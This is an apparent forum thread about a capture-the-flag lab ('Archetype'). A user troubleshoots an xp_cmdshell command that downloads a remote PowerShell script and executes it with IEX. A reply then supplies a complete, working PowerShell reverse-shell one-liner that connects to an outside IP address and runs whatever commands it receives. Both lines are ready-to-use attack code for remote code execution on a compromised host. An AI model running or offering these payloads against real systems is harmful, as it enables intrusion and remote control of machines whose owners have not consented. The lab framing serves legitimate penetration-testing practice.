Hey,
Trying to do the archetype starting point challenge but I end up getting the following error whilst doing the command:
xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.12/shell.ps1\“);”
Error:
IEX : At line:1 char:275
The ampersand (&) character is not allowed. The & operator is reserved for future use; wrap an ampersand in double
quotation marks (“&”) to pass it as part of a string.
Does anyone know a fix? Followed the instructions as in the PDF. I tried doing it with quatation marks around it but still end up with errors.
//Fixed
Solution: Do not copy straight from the PDF and recheck every space if you do decide to copy the shell code.
Cork
July 13, 2021, 9:30am
3
@Inspect said:
//Fixed
Solution: Do not copy straight from the PDF and recheck every space if you do decide to copy the shell code.
Do you mind posting an actual fix, because I see this as a technical problem, not a spoiler.
Yea i bumped in to it and what @Inspect means is that the script that is in the PDF it doesnt have spaces i found a github account that has the same onliner for the powershell netcat script:
powershell_reverse_shell.ps1
# Nikhil SamratAshok Mittal: http://www.labofapenetrationtester.com/2015/05/week-of-powershell-shells-day-1.html
$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',80);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex ". { $data } 2>&1" | Out-String ); $sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
happy hacking